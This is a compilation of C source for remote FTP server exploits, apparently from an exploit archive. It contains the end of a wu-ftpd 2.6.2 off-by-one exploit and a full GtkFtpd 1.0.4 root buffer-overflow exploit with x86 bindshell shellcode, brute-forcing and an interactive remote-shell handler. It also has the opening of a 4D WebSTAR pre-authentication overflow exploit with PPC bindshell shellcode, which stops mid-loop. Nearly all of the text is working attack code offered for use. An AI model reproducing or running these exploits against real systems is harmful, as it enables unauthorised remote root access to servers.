int make_retloc(int sock,int type,char *atk_bf,u_long sh_addr)
{
int r_rn_1=(NRL),r_rn_2=(NRL),cmd_f=(NRL);
char get_nm[(GET_R)];
memset((char *)atk_bf,(NRL),(GET_R));
if(type) /* MKD command */
{
atk_bf[cmd_f++]=(0x4d);
atk_bf[cmd_f++]=(0x4b);
atk_bf[cmd_f++]=(0x44);
atk_bf[cmd_f++]=(0x20);
}
else /* RMD command */
{
atk_bf[cmd_f++]=(0x52);
atk_bf[cmd_f++]=(0x4d);
atk_bf[cmd_f++]=(0x44);
atk_bf[cmd_f++]=(0x20);
}
for(r_rn_1=(cmd_f),r_rn_2=(NRL);r_rn_2<(DEF_VA)-strlen(home_dir)-(plat[t_g].off_st);r_rn_2++)
atk_bf[r_rn_1++]=(0x41);
{
int chk_0xff=(NRL);
switch(t_g)
{
case 0:
case 1:
case 2:
/* frame pointer */
*(long *)&atk_bf[r_rn_1]=0x82828282;
r_rn_1+=(DEF_ALIGN);
for(chk_0xff=(NRL);chk_0xff<0x20;chk_0xff+=(DEF_ALIGN*2))
{
if((sh_addr>>(chk_0xff)&0xff)==(0xff))
atk_bf[r_rn_1++]=0xff;
atk_bf[r_rn_1++]=(sh_addr>>(chk_0xff)&0xff);
}
break;
case 3:
case 4:
case 5:
/* frame pointer */
*(long *)&atk_bf[r_rn_1]=0x82828282;
r_rn_1+=(DEF_ALIGN);
for(chk_0xff=(NRL);chk_0xff<0x20;chk_0xff+=(DEF_ALIGN*2))
{
if((sh_addr>>(chk_0xff)&0xff)==(0xff))
atk_bf[r_rn_1++]=0xff;
atk_bf[r_rn_1++]=(sh_addr>>(chk_0xff)&0xff);
}
for(r_rn_2=(NRL);r_rn_2<(DEF_ALIGN*10);r_rn_2++)
{
atk_bf[r_rn_1++]=(0x41);
}
break;
case 6:
case 7:
case 8:
for(r_rn_2=(NRL);r_rn_2<(DEF_ALIGN*10);r_rn_2++)
{
atk_bf[r_rn_1++]=(0x41);
}
/* frame pointer */
*(long *)&atk_bf[r_rn_1]=0x82828282;
r_rn_1+=(DEF_ALIGN);
for(chk_0xff=(NRL);chk_0xff<0x20;chk_0xff+=(DEF_ALIGN*2))
{
if((sh_addr>>(chk_0xff)&0xff)==(0xff))
atk_bf[r_rn_1++]=0xff;
atk_bf[r_rn_1++]=(sh_addr>>(chk_0xff)&0xff);
}
break;
}
*(long *)&atk_bf[r_rn_1]=0x41414141;
r_rn_1+=(DEF_ALIGN);
*(long *)&atk_bf[r_rn_1]=0x0d414141;
r_rn_1+=(DEF_ALIGN);
atk_bf[r_rn_1++]=(0x0a);
}
send(sock,atk_bf,strlen(atk_bf),(NRL));
(u_int)sleep(SCS);
memset((char *)get_nm,(NRL),sizeof(get_nm));
recv(sock,get_nm,sizeof(get_nm)-1,(NRL));
if(type) /* MKD command */
{
if(!strstr(get_nm,(MKD_COMM_SCS))&&!strstr(get_nm,(MKD_EXIST)))
{
fprintf(stdout," [-] MKD &shellcode_dir failed.\n\n");
exit(FAD);
}
else fprintf(stdout," [+] Ok, MKD &shellcode_dir.\n");
}
else /* RMD command */
{
if(!strstr(get_nm,(CWD_COMM_SCS)))
{
fprintf(stdout," [-] RMD &shellcode_dir failed.\n\n");
exit(FAD);
}
else fprintf(stdout," [+] Ok, RMD &shellcode_dir.\n");
}
return;
}
int main(int argc,char *argv[])
{
int opt_g,sock,__bf=(NRL);
int mx_bf=(MAX_BF),bf_lsz=(BF_LSZ);
char user_id[(DEF_VA)]=(DEF_STR);
char pass_wd[(DEF_VA)]=(DEF_STR);
char tg_host[(DEF_VA)]=(DEF_HOST);
int tg_port=(DEF_PORT);
u_long sh_addr=(plat[t_g].sh_addr);
(void)banrl();
while((opt_g=getopt(argc,argv,"QqCcM:m:H:h:U:u:P:p:N:n:S:s:T:t:B:b:Ii"))!=EOF)
{
extern char *optarg;
switch(opt_g)
{
case 'Q':
case 'q':
fprintf(stdout," Banner scan mode.\n");
b_scan=(SCS);
break;
case 'C':
case 'c':
fprintf(stdout," Check exploit test mode.\n");
__exp_test=(SCS);
break;
case 'M':
case 'm':
mx_bf=(atoi(optarg));
bf_lsz=((0x1000)/mx_bf);
break;
case 'H':
case 'h':
memset((char *)tg_host,(NRL),sizeof(tg_host));
strncpy(tg_host,optarg,sizeof(tg_host)-1);
break;
case 'U':
case 'u':
memset((char *)user_id,(NRL),sizeof(user_id));
strncpy(user_id,optarg,sizeof(user_id)-1);
break;
case 'P':
case 'p':
memset((char *)pass_wd,(NRL),sizeof(pass_wd));
strncpy(pass_wd,optarg,sizeof(pass_wd)-1);
break;
case 'N':
case 'n':
tg_port=(atoi(optarg));
break;
case 'S':
case 's':
sh_addr=strtoul(optarg,(NRL),(NRL));
break;
case 'T':
case 't':
if((t_g=(atoi(optarg)))<(9))
sh_addr=(plat[t_g].sh_addr);
else (void)prcode_usage(argv[(NRL)]);
break;
case 'B':
case 'b':
if((t_g=(atoi(optarg)))<(9))
{
sh_addr=(plat[t_g].bf_addr);
__bf=(SCS);
}
else (void)prcode_usage(argv[(NRL)]);
break;
case 'I':
case 'i':
(void)prcode_usage(argv[(NRL)]);
break;
case '?':
(void)prcode_usage(argv[(NRL)]);
break;
}
}
if(!strcmp(user_id,(DEF_STR))||!strcmp(pass_wd,(DE F_STR)))
(void)prcode_usage(argv[(NRL)]);
memset((char *)home_dir,(NRL),sizeof(home_dir));
snprintf(home_dir,sizeof(home_dir)-1,"%s%s",(plat[t_g].home),user_id);
if(!__bf)
{
fprintf(stdout," Target: %s.\n",(plat[t_g].v_nm));
sh_addr=(u_long)null_chk(sh_addr);
fprintf(stdout," [+] address: %p.\n",sh_addr);
fprintf(stdout," #1 Try, %s:%d ...",tg_host,tg_port);
fflush(stdout);
sock=(int)setsock(tg_host,tg_port);
(void)re_connt(sock);
fprintf(stdout," [ OK ]\n");
fprintf(stdout," [1] ftpd connection login.\n");
(void)ftpd_login(sock,user_id,pass_wd);
fprintf(stdout," [2] send exploit code.\n");
(void)make_send_exploit(sock,(SCS),sh_addr,(SCS));
close(sock);
fprintf(stdout," [+] #2 Try, %s:%d ...",tg_host,tg_port);
fflush(stdout);
sock=(int)setsock(tg_host,tg_port);
(void)re_connt(sock);
fprintf(stdout," [ OK ]\n");
fprintf(stdout," [3] ftpd connection login.\n");
(void)ftpd_login(sock,user_id,pass_wd);
fprintf(stdout," [4] send exploit code.\n");
(void)make_send_exploit(sock,(NRL),sh_addr,(NRL));
fprintf(stdout," [5] Waiting, execute the shell ");
fflush(stdout);
(u_int)sleep(SCS);
fprintf(stdout,".");
fflush(stdout);
(u_int)sleep(SCS);
fprintf(stdout,".");
fflush(stdout);
(u_int)sleep(SCS);
fprintf(stdout,".\n");
(void)conn_shell(sock,sh_addr);
close(sock);
}
else
{
int bt_num=(NRL);
fprintf(stdout," Brute-Force mode.\n");
fprintf(stdout," [+] BF Count: %d.\n",mx_bf);
fprintf(stdout," [+] BF Size: +%d.\n\n",bf_lsz);
for(bt_num=(NRL);bt_num<(mx_bf);bt_num++)
{
sh_addr=(u_long)null_chk(sh_addr);
fprintf(stdout," [+] Brute-Force address: %p.\n",sh_addr);
fprintf(stdout," #1 Try, %s:%d ...",tg_host,tg_port);
fflush(stdout);
sock=(int)setsock(tg_host,tg_port);
(void)re_connt(sock);
fprintf(stdout," [ OK ]\n");
fprintf(stdout," [1] ftpd connection login.\n");
(void)ftpd_login(sock,user_id,pass_wd);
fprintf(stdout," [2] send exploit code.\n");
if(bt_num==(NRL))
{
(void)make_send_exploit(sock,(SCS),sh_addr,(SCS));
}
else
{
(void)make_send_exploit(sock,(SCS),sh_addr,(NRL));
}
close(sock);
fprintf(stdout," [+] #2 Try, %s:%d ...",tg_host,tg_port);
fflush(stdout);
sock=(int)setsock(tg_host,tg_port);
(void)re_connt(sock);
fprintf(stdout," [ OK ]\n");
fprintf(stdout," [3] ftpd connection login.\n");
(void)ftpd_login(sock,user_id,pass_wd);
fprintf(stdout," [4] send exploit code.\n");
(void)make_send_exploit(sock,(NRL),sh_addr,(NRL));
fprintf(stdout," [5] Waiting, execute the shell ");
fflush(stdout);
(u_int)sleep(SCS);
fprintf(stdout,".");
fflush(stdout);
(u_int)sleep(SCS);
fprintf(stdout,".");
fflush(stdout);
(u_int)sleep(SCS);
fprintf(stdout,".\n");
(void)conn_shell(sock,sh_addr);
close(sock);
sh_addr+=(bf_lsz);
}
}
exit(NRL);
}
int setsock(char *u_host,int u_port)
{
int sock;
struct hostent *sxp;
struct sockaddr_in sxp_addr;
if((sxp=gethostbyname(u_host))==(GET_HOST_NM_ERR))
{
return(FAD);
}
if((sock=socket(AF_INET,SOCK_STREAM,(NRL)))==(FAD) )
{
return(FAD);
}
sxp_addr.sin_family=AF_INET;
sxp_addr.sin_port=htons(u_port);
sxp_addr.sin_addr=*((struct in_addr*)sxp->h_addr);
bzero(&(sxp_addr.sin_zero),(SIN_ZR_SIZE));
if(connect(sock,(struct sockaddr *)&sxp_addr,sizeof(struct sockaddr))==(FAD))
{
return(FAD);
}
return(sock);
}
void conn_shell(int conn_sock,u_long scs_addr)
{
int died;
int ex_t=(NRL);
char *command,readbuf[(GET_R)];
fd_set rset;
switch(t_g)
{
case 0:
case 1:
case 2:
case 3:
case 4:
case 5:
command=(DEF_COMM);
break;
case 6:
case 7:
case 8:
command=(DEF_COMM_OB);
break;
}
memset((char *)readbuf,(NRL),sizeof(readbuf));
fprintf(stdout," Send, command packet !\n\n");
send(conn_sock,command,strlen(command),(NRL));
for(;;)
{
fflush(stdout);
FD_ZERO(&rset);
FD_SET(conn_sock,&rset);
FD_SET(STDIN_FILENO,&rset);
select(conn_sock+1,&rset,NULL,NULL,NULL);
if(FD_ISSET(conn_sock,&rset))
{
died=read(conn_sock,readbuf,sizeof(readbuf)-1);
if(died<=(NRL))
{
if(!ex_t)
{
fprintf(stderr," [-] exploit failure.\n\n");
return;
}
else
{
fprintf(stdout," exploit successfully ! (&shellcode_addr: %p)\n\n",scs_addr);
exit(NRL);
}
}
readbuf[died]=(NRL);
fprintf(stdout,"%s",readbuf);
}
if(FD_ISSET(STDIN_FILENO,&rset))
{
died=read(STDIN_FILENO,readbuf,sizeof(readbuf)-1);
if(died>(NRL))
{
readbuf[died]=(NRL);
if(strstr(readbuf,"exit"))
ex_t=(SCS);
write(conn_sock,readbuf,died);
}
}
}
return;
}
void re_connt(int st_sock_va)
{
if(st_sock_va==(FAD))
{
fprintf(stdout," [ Fail ]\n\n");
exit(FAD);
}
}
void banrl()
{
fprintf(stdout,"\n 0x82-WOOoou~Happy_new - wu-ftpd v2.6.2 off-by-one remote exploit.\n\n");
}
int check_exp(int sock)
{
int conn_died;
char gt_bf[(GET_R)];
fprintf(stdout,"\n [+] Check exploit test ...\n");
send(sock,"X82\r\n",strlen("X82\r\n"),(NRL)); /* test packet */
(u_int)sleep(SCS);
memset((char *)gt_bf,(NRL),sizeof(gt_bf));
conn_died=read(sock,gt_bf,sizeof(gt_bf)-1);
if(strstr(gt_bf,(CMD_ERROR)))
{
fprintf(stdout," [X] After test exploit, wu-ftpd is alive.\n");
return(FAD);
}
else if(conn_died<=(NRL))
{
fprintf(stdout," Ok, This is vulnerable version.\n\n");
return(SCS);
}
else return(FAD);
}
/* eoc */
// [2003-08-11]
21 GtkFtpd 1.0.4 Remote Root Buffer Overflow Exploit
/************************************************** ********
* [ gtkftpd[v1.0.4(and below)]: remote root buffer overflow exploit. ]
*
* by: vade79/v9 v9 at fakehalo.deadpig.org (fakehalo/realhalo)
*
* Url:
* http://gtkftpd.sourceforge.net/
*
* GtkFtpd, versions v1.0.4 and below(as of this time), contain a
* remotely exploitable buffer overflow. the overflow occurs when
* GtkFtpd allocates the appropriate amount of memory to hold a
* filename or directory(256 bytes), but does not account for the
* date/user/stat prefix(~40 bytes) it prepends to the buffer.
*
* When exploited, things are made easier due to the fact that
* GtkFtpd does not chroot() or drop its root privileges(as are
* required to run the program itself) while running. And one step
* more easier because when the buffer is overflown it is in a child
* process, making it possible to brute force(not crash).
*
* Requirements to exploit:
* - A valid account. (user/pass, anonymous will do)
* - A writable directory. (usually gtkftpd makes any dir writable)
*
* Usage:
* # cc xgtkftpd.c -o xgtkftpd
* # ./xgtkftpd [-Psupcbanrd] -h hostname
* *
* Exploit workings(ftp commands):
* MKDIR <large name/causes overflow>
* LIST -<shellcode> (where the overflow occurs)
*
* The exploitable code itself is found in src/sys_cmd.c:
* 12:#define BUF_SIZE 256
* 21:char buf[BUF_SIZE];
* 57:sprintf(buf, "%s\t%s", perm_date_siz, entr->d_name);
*
* Note:
* Make sure the directory used to "LIST" does not already contain
* any large filenames or directories, as the first overly long one
* to list will cause the overflow. (which will fail the exploit)
* *
* (should work out of the box on generic linux, tested on rh7.1.
* squished, un-tab'd, un-space'd, exploit code; just how i like it.)
************************************************** ********/
#include <stdio.h>
#include <stdlib.h>
#include <stdarg.h>
#include <string.h>
#include <unistd.h>
#include <signal.h>
#include <getopt.h>
#include <ctype.h>
#include <time.h>
#include <netdb.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/time.h>
#include <netinet/in.h>
#include <arpa/inet.h>
/* default definitions, change at will. */
#define DFLUSER "anonymous" /* no argument, default username. */
#define DFLPASS "[email protected]" /* no argument, default password. */
#define DFLDIR "/incoming" /* no argument, default +w directory. */
#define DFLCLM 80 /* default screen width to use. */
#define DFLADDR 0xbffffffa /* base brute address. */
#define TIMEOUT 10 /* connection timeout. */
static char x86_exec[]= /* bindshell(sport), modded from netric. */
/* port defined in byte 20, and 21; in a 'short' cast form. */
"\x31\xc0\x50\x40\x89\xc3\x50\x40\x50\x89\xe1\xb0\x 66\xcd\x80\x31"
"\xd2\x52\x66\x68\x00\x00\x43\x66\x53\x89\xe1\x6a\x 10\x51\x50\x89"
"\xe1\xb0\x66\xcd\x80\x40\x89\x44\x24\x04\x43\x43\x b0\x66\xcd\x80"
"\x83\xc4\x0c\x52\x52\x43\xb0\x66\xcd\x80\x93\x89\x d1\xb0\x3f\xcd"
"\x80\x41\x80\xf9\x03\x75\xf6\x52\x68\x6e\x2f\x73\x 68\x68\x2f\x2f"
"\x62\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80";
/* protos/functions. */
char *getdir(unsigned int);
char *getbdir(void);
char *getcode(void);
void filter_text(char *);
void ftp_printf(int,char *,...);
void ftp_clean(int);
void ftp_read(int);
void ftp_parse(int);
void ftp_connect(void);
void getshell(int,unsigned int);
void printe(char *,short);
void usage(char *);
void sig_ctrlc(){printe("user aborted.",1);}
void sig_alarm(){printe("alarm/timeout hit.",1);}
void sig_pipe(){printe("connection closed/failed.",1);}
/* globals. (ease of use throughout) */
unsigned short align=2; /* probably will never need to be otherwise. */
unsigned short port=21; /* generic ftp daemon port. */
unsigned short sport=7979; /* generic bindshell port. */
unsigned short reverse=0; /* go upward, instead of downward */
unsigned short no_io=0; /* do not show traffic. */
unsigned int attempts=100; /* number of times to brute. */
unsigned int columns=80; /* generic screen width. */
unsigned int ftp_i=0; /* Nth time read ftp socket. */
unsigned int baseaddr=DFLADDR; /* base address. (again) */
char *host; /* hostname/target, a must have. */
char *user; /* username to use. */
char *pass; /* password to use. */
char *writedir; /* need a writable directory. */
char *basedir; /* gets filled in later. */
/* program start. */
int main(int argc,char **argv){
int chr=0;
printf(" gtkftpd[v1.0.4(and below)]: remote root buffer overflow"
" exploit.\n by: vade79/v9 [email protected] (fakehalo)\n\n");
/* set the chomp point, filter long lines. */
if(getenv("COLUMNS"))columns=atoi(getenv("COLUMNS"));
if(7>columns||columns>256)columns=DFLCLM;
while((chr=getopt(argc,argv,"h:P:s:u:p:c:b:a:n:rd"))!=EOF){
switch(chr){
case 'h':
if(!host&&!(host=(char *)strdup(optarg)))
printe("main(): allocating memory failed.",1);
break;
case 'P':
port=atoi(optarg);
break;
case 's':
sport=atoi(optarg);
break;
case 'u':
if(!user&&!(user=(char *)strdup(optarg)))
printe("main(): allocating memory failed.",1);
break;
case 'p':
if(!pass&&!(pass=(char *)strdup(optarg)))
printe("main(): allocating memory failed.",1);
break;
case 'c':
if(!writedir&&!(writedir=(char *)strdup(optarg)))
printe("main(): allocating memory failed.",1);
break;
case 'b':
sscanf(optarg,"%x",&baseaddr);
break;
case 'a':
align=atoi(optarg);
break;
case 'n':
attempts=atoi(optarg);
break;
case 'r':
reverse=1;
break;
case 'd':
no_io=1;
break;
default:
usage(argv[0]);
break;
}
}
if(!host)
usage(argv[0]);
/* fill in the blanks, or out of bounds. */
if(!user)user=DFLUSER;
if(!pass)pass=DFLPASS;
if(!writedir)writedir=DFLDIR;
if(!baseaddr)baseaddr=DFLADDR;
if(align>3)align=2;
if(!((sport&0xff00)>>8)||!(sport&0x00ff)){
printf("[!] shell port defined contains null byte(s), using default.\n");
sport=7979; /* back to default. */
}
/* change the bindshell port. */
x86_exec[20]=(sport&0xff00)>>8;
x86_exec[21]=(sport&0x00ff);
/* verbose. */
printf(" target: %s:%d, identity: %s:%s.\n directory: %s, brute"
" start: 0x%.8x, alignment: %d.\n memory direction: %s, attempts: "
"%d, bindshell port: %d.\n\n",host,port,user,pass,writedir,baseaddr,
align,(!reverse?"downward":"upward"),attempts,sport);
signal(SIGINT,sig_ctrlc); /* explained/pretty exit. */
signal(SIGPIPE,sig_pipe); /* handle abnormal disconnects. */
ftp_connect(); /* do the magic, brute force. */
printe("brute force exhausted, failed.",0);
exit(0);
}
char *getdir(unsigned int offset){
unsigned int i=0;
char *buf;
/* 256 will fail; 255 or less. */
if(!(buf=(char *)malloc(255+1)))
printe("getdir(): allocating memory failed.",1);
memset(buf,0x0,255+1);
if(align)memset(buf,'x',align);
for(i=align;i<252;i+=4){
if(!reverse)*(long *)&buf[i]=(baseaddr-offset);
else *(long *)&buf[i]=(baseaddr+offset);
}
return(buf);
}
char *getbdir(void){
char *buf;
time_t ttt;
struct tm *ttm;
if(!(buf=(char *)malloc(32+1)))
printe("getbdir(): allocating memory failed",1);
ttt=time(NULL);
ttm=localtime(&ttt);
strftime(buf,32,"tmp_%H:%M:%S_%d-%m-%Y",ttm);
return(buf);
}
char *getcode(void){
char *buf;
if(!(buf=(char *)malloc(512+1)))
printe("getcode(): allocating memory failed",1);
memset(buf,0x90,(512-strlen(x86_exec)));
memcpy(buf+(512-strlen(x86_exec)),x86_exec,strlen(x86_exec));
return(buf);
}
void filter_text(char *ptr){
unsigned int i=0;
for(i=0;i<strlen(ptr);i++){
/* keep it short and sweet. */
if(i>=(columns-3)){
ptr[i--]=0x0;
ptr[i--]='.';
ptr[i--]='.';
ptr[i]='.';
}
/* don't make \r or \n a '?'. */
else if(ptr[i]=='\r'||ptr[i]=='\n')ptr[i]=0x0;
/* don't ugly the local terminal. */
else if(!isprint(ptr[i]))ptr[i]='?';
}
return;
}
void ftp_printf(int sock,char *fmt,...){
char *buf;
va_list ap;
if(!(buf=(char *)malloc(1024+1)))
printe("ftp_printf(): allocating memory failed.",1);
memset(buf,0x0,1024+1);
va_start(ap,fmt);
vsnprintf(buf,1024,fmt,ap);
va_end(ap);
write(sock,buf,strlen(buf)); /* write it, then mod it for display. */
filter_text(buf);
if(!no_io)
printf("-> %s\n",buf);
free(buf);
return;
}
void ftp_clean(int sock){
ftp_printf(sock,"CWD ..\r\n");
ftp_read(sock);
ftp_printf(sock,"RMD %s\r\n",basedir);
ftp_read(sock);
ftp_printf(sock,"QUIT\r\n");
ftp_read(sock);
return;
}
void ftp_read(int sock){
char *buf;
if(!(buf=(char *)malloc(1024+1)))
printe("ftp_read(): allocating memory failed.",1);
memset(buf,0x0,1024);
read(sock,buf,1024);
filter_text(buf);
if(!no_io)
printf("<- %s\n",buf);
/* some initial reply checking, not too much. */
if(!ftp_i)
if(!strstr(buf,"GtkFTPd"))
printe("this exploit is only for GtkFTPd, failed.",1);
if(ftp_i==2)
if(strncmp(buf,"230",3))
printe("invalid username/password, failed.",1);
if(ftp_i==3)
if(strncmp(buf,"250",3))
printe("invalid writable directory, failed. (try \"/\")",1);
free(buf);
ftp_i++; /* increase the response identifier. */
return;
}
void ftp_parse(int sock){
unsigned int offset=0;
ftp_read(sock); /* get the banner. */
ftp_printf(sock,"USER %s\r\n",user);
ftp_read(sock);
ftp_printf(sock,"PASS %s\r\n",pass);
ftp_read(sock);
ftp_printf(sock,"CWD %s\r\n",writedir);
ftp_read(sock);
basedir=getbdir(); /* tmp dir of our own to use. */
ftp_printf(sock,"MKD %s\r\n",basedir);
ftp_read(sock);
ftp_printf(sock,"CWD %s\r\n",basedir);
ftp_read(sock);
while(offset<(attempts*400)){ /* if it hasn't yet, it's not going to. */
/* slight null-byte/CR check, only needs to check the last byte. */
if((!reverse&&!((baseaddr-offset)&0xff))||(reverse&&!((baseaddr+offset)
&0xff))||(!reverse&&((baseaddr-offset)&0xff)=='\n')||(reverse&&
((baseaddr+offset)&0xff)=='\n')){
printf("[!] brute address contains null-byte/CR, increasing offset "
"by one byte.\n");
offset++; /* one byte off if reversed won't hurt here. (401) */
}
/* make the evil oversized directory. (255 or less bytes) */
ftp_printf(sock,"MKD %s\r\n",getdir(offset));
ftp_read(sock);
/* date+directory exceeds 256 byte buffer, the exploit. */
sleep(1); /* delay insurance. */
ftp_printf(sock,"LIST -%s\r\n",getcode());
/* nothing to read here, and gtkftpd processes (the exploit) */
/* before the ftp list connection is made, making it */
/* pointless to view the list. */
sleep(1); /* delay insurance, again, just to be sure. */
/* delete directory, multiples will cause failure(s). */
ftp_printf(sock,"RMD %s\r\n",getdir(offset));
ftp_read(sock);
getshell(sock,offset);
offset+=400; /* always at least 400 nops in a row, in shellcode. */
}
ftp_clean(sock);
close(sock);
return;
}
void ftp_connect(void){
int sock;
struct hostent *t;
struct sockaddr_in s;
sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
s.sin_family=AF_INET;
s.sin_port=htons(port);
if((s.sin_addr.s_addr=inet_addr(host))){
if(!(t=gethostbyname(host)))
printe("couldn't resolve hostname.",1);
memcpy((char*)&s.sin_addr,(char*)t->h_addr,sizeof(s.sin_addr));
}
printf(" attempting to connect: %s:%d.\n",host,port);
signal(SIGALRM,sig_alarm);
alarm(TIMEOUT);
if(connect(sock,(struct sockaddr *)&s,sizeof(s)))
printe("gtkftpd connection failed.",1);
alarm(0);
printf(" connected successfully: %s:%d.\n",host,port);
ftp_parse(sock);
return;
}
void getshell(int ftpsock,unsigned int offset){
int sock,r;
fd_set fds;
char buf[4096+1];
struct hostent *he;
struct sockaddr_in sa;
if((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))= =-1)
printe("getshell(): socket() failed.",1);
sa.sin_family=AF_INET;
if((sa.sin_addr.s_addr=inet_addr(host))){
if(!(he=gethostbyname(host)))
printe("getshell(): couldn't resolve.",1);
memcpy((char *)&sa.sin_addr,(char *)he->h_addr,sizeof(sa.sin_addr));
}
sa.sin_port=htons(sport);
signal(SIGALRM,sig_alarm);
alarm(TIMEOUT);
printf(" checking for bindshell: %s:%d. (0x%.8x)\n",host,sport,
(!reverse?(baseaddr-offset):(baseaddr+offset)));
if(connect(sock,(struct sockaddr *)&sa,sizeof(sa))){
printf("[!] connection failed: %s:%d.\n",host,sport);
close(sock); /* don't want fd's to fill up. */
alarm(0);
return;
}
alarm(0);
printf(" successfully connected: %s:%d.\n",host,sport);
printf(" attempting to cleanup leftover directory(s).\n");
ftp_clean(ftpsock);
close(ftpsock);
printf(" entering remote shell. (%s:%d)\n\n",host,sport);
signal(SIGINT,SIG_IGN);
write(sock,"cd /;uname -a;id\n",18);
while(1){
FD_ZERO(&fds);
FD_SET(0,&fds);
FD_SET(sock,&fds);
if(select(sock+1,&fds,0,0,0)<1)
printe("getshell(): select() failed.",1);
if(FD_ISSET(0,&fds)){
if((r=read(0,buf,4096))<1)
printe("getshell(): read() failed.",1);
if(write(sock,buf,r)!=r)
printe("getshell(): write() failed.",1);
}
if(FD_ISSET(sock,&fds)){
if((r=read(sock,buf,4096))<1)exit(0);
write(1,buf,r);
}
}
close(sock);
return;
}
void printe(char *err,short e){
printf("[!] error: %s\n",err);
if(e)exit(1);
return;
}
void usage(char *name){
printf(" usage: %s [options] -h hostname\n\n options:\n"
" -h <string>\tdefines the target host/ip.\t(REQUIRED)\n"
" -P <number>\tdefines the target port.\t(%d)\n"
" -s <number>\tdefines the bindshell port.\t(%d)\n"
" -u <string>\tdefines the username.\t\t(\"%s\")\n"
" -p <string>\tdefines the password.\t\t(\"%s\")\n"
" -c <string>\tdefines the writable directory.\t(\"%s\")\n"
" -b <string>\tdefines the base brute address.\t(0x%.8x)\n"
" -a <number>\tdefines the alignment.\t\t(%d)\n"
" -n <number>\tdefines the number of attempts.\t(%d)\n"
" -r\t\tgo upward in memory, instead of downward.\n"
" -d\t\tdo not show verbose ftp in/out traffic.\n\n",
name,port,sport,DFLUSER,DFLPASS,DFLDIR,DFLADDR,ali gn,attempts);
exit(0);
}
// [2003-08-28]
21 4D WebSTAR FTP Server Suite Remote Buffer Overflow Exploit
/*
Remote Vulnerability in 4D WebSTAR Server Suite - Exploit
================================================
Date: 11.09.2003
Author: B-r00t. 2003.
Email: B-r00t blueyonder.co.uk
Reference: http://www.4d.com/products/webstar.html
Versions: 4D WebSTAR 5.3.1 (Latest) => VULNERABLE.
Tested: 4D WebSTAR 5.3.1 (Trial Version).
Exploit: 4DWS_ftp.c - On success a bindshell is spawned
on port 6969. Although the resulting shell is
UID 'webstart', it is usually possible to
execute 'nidump passwd .' to obtain the system
password hashes for cracking.
Compile: gcc -o 4DWS_ftp 4DWS_ftp.c
Description: There is a pre authentication buffer overflow
that exists in the login mechanism of the WebSTAR
FTP service. See advisory for further details.
Remember Kiddiez ... An Apple A Day ...!!!!
*/
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <time.h>
#include <netdb.h>
// Defines
#define EXPLOIT "4DWS_ftp"
#define BINDSHELL_PORT 6969
#define FTP_PORT 21
#define MAXSIZE 1024
// Prototypes
int usage (void);
int get_connect (int port, char *host);
int send_sock (char *buff);
int read_sock (char *buff);
int check_bindshell(int port, char *host);
//Variables
int sock, port=21, lsb;
char evilbuff[MAXSIZE], temp[MAXSIZE];
char user[] = "USER 4D4D" "\x0d\x0a";
char retaddy[5], filler[MAXSIZE];
unsigned long int ret, loop;
int main (int argc, char *argv[])
{
char shellcode[] = //PPC forkin bindshell 6969 by B-r00t.2003.
"\x7c\xa5\x2a\x79\x40\x82\xff\xfd\x7d\x68\x02\xa6\x 3b\xeb\x01\x70"
"\x39\x80\x01\x70\x3b\xdf\xff\x88\x7c\xbe\x29\xae\x 3b\xdf\xff\x89"
"\x7c\xbe\x29\xae\x3b\xdf\xff\x8a\x7c\xbe\x29\xae\x 3b\xdf\xff\x8b"
"\x7c\xbe\x29\xae\x38\x6c\xfe\x92\x38\x8c\xfe\x91\x 38\xac\xfe\x96"
"\x38\x0c\xfe\xf1\x44\xff\xff\x02\x60\x60\x60\x60\x 7c\x67\x1b\x78"
"\x38\x9f\xff\x84\x38\xac\xfe\xa0\x38\x0c\xfe\xf8\x 44\xff\xff\x02"
"\x60\x60\x60\x60\x7c\xe3\x3b\x78\x38\x8c\xfe\x91\x 38\x0c\xfe\xfa"
"\x44\xff\xff\x02\x60\x60\x60\x60\x7c\xe3\x3b\x78\x 38\x8c\xfe\x90"
"\x38\xac\xfe\x90\x38\x0c\xfe\xae\x44\xff\xff\x02\x 60\x60\x60\x60"
"\x38\x8c\xfe\x90\x38\x0c\xfe\xea\x44\xff\xff\x02\x 60\x60\x60\x60"
"\x38\x8c\xfe\x91\x38\x0c\xfe\xea\x44\xff\xff\x02\x 60\x60\x60\x60"
"\x38\x8c\xfe\x92\x38\x0c\xfe\xea\x44\xff\xff\x02\x 60\x60\x60\x60"
"\x38\x0c\xfe\x92\x44\xff\xff\x02\x60\x60\x60\x60\x 39\x1f\xff\x83"
"\x7c\xa8\x29\xae\x38\x7f\xff\x7c\x90\x61\xff\xf8\x 90\xa1\xff\xfc"
"\x38\x81\xff\xf8\x38\x0c\xfe\xcb\x44\xff\xff\x02\x 41\x41\x41\x41"
"\x41\x41\x41\x41\x2f\x62\x69\x6e\x2f\x73\x68\x58\x ff\x02\x1b\x39"
"\x41\x41\x41\x41"; // Yu Cant Get This Stuff In Storez Man!!!
char nops[] =
"\x60\x60\x60\x60\x60\x60\x60\x60";
printf ("\n%s by B-r00t <[email protected]>. (c) 2003.\n",
EXPLOIT);
printf ("\nExploits the pre authentication buffer overflow in
the");
printf ("\nWebSTAR 5.3.1 FTP service.");
if (argc < 2)
usage ();
printf ("\nPatience ...\n\n");
memset(filler, '\0', sizeof(filler));
memset(filler, 0x78, 173);
filler[0] = 'P';
filler[1] = 'A';
filler[2] = 'S';
filler[3] = 'S';
filler[4] = 0x20;
for (lsb=0; lsb<9; lsb+=4) {//Increase range if no succcess.
for (loop=0xf018f504+lsb; loop<0xf028f505+lsb; loop+=0x1000)
{
ret=loop;
printf ("\n[0x%x] ", ret);
retaddy[0] = (int)((ret & 0xff000000) >> 24);
retaddy[1] = (int)((ret & 0x00ff0000) >> 16);
retaddy[2] = (int)((ret & 0x0000ff00) >> 8);
retaddy[3] = (int) (ret & 0x000000ff);
retaddy[4] = '\0';
memset(evilbuff, '\0', sizeof(evilbuff));
strcpy (evilbuff, filler);
strcat (evilbuff, retaddy);
strcat (evilbuff, nops);
strcat (evilbuff, shellcode);
strcat (evilbuff, "\x0d\x0a");
if ((sock=socket(AF_INET, SOCK_STREAM, 6)) == -1)
{
perror(" Retrying! ");
loop-=0x1000;
sleep(2);
continue;
}
